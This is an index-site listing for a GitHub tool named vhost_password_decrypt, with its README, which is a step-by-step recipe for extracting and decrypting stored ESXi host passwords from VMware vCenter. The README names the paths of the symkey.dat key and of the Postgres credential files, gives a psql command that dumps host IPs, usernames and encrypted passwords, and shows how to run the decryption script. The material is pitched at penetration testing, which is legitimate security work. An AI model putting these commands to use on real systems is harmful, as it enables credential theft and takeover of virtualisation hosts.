Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/shmilylty/vhost_password_decrypt
vhost password decrypt
https://github.com/shmilylty/vhost_password_decrypt
Last synced: 3 months ago
JSON representation
vhost password decrypt
- Host: GitHub
- URL: https://github.com/shmilylty/vhost_password_decrypt
- Owner: shmilylty
- Created: 2021-12-13T09:47:36.000Z (almost 3 years ago)
- Default Branch: main
- Last Pushed: 2022-10-25T10:40:23.000Z (about 2 years ago)
- Last Synced: 2024-06-06T20:05:16.496Z (5 months ago)
- Language: Python
- Size: 11.7 KB
- Stars: 224
- Watchers: 4
- Forks: 61
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-hacking-lists - shmilylty/vhost_password_decrypt - vhost password decrypt (Python)
README
# vhost_password_decrypt
## Where is symkey.dat
Windows:C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\ssl\symkey.dat
Linux:/etc/vmware-vpx/ssl/symkey.dat
## Where is postgres user password
Windows: C:\ProgramData\VMware\vCenterServer\cfg\vmware-vps\vcdb.properties
Linux:
/etc/vmware-vpx/vcdb.properties
/etc/vmware/service-state/vpxd/vcdb.properties
## Where is psql
Windows: C:\Program Files\VMware\vCenter Server\vPostgres\bin\psql.exe
Linux: /opt/vmware/vpostgres/9.3/bin/psql
## export
psql -h 127.0.0.1 -p 5432 -U vc -d VCDB -c "select ip_address,user_name,password from vpx_host;" > password.enc
## How to use
pip3 install pycryptodome
python3 decrypt.py symkey.dat password.enc password.txt
# How this might help during a pentest / tutorial
see the end -> https://pentera.io/blog/information-disclosure-in-vmware-vcenter/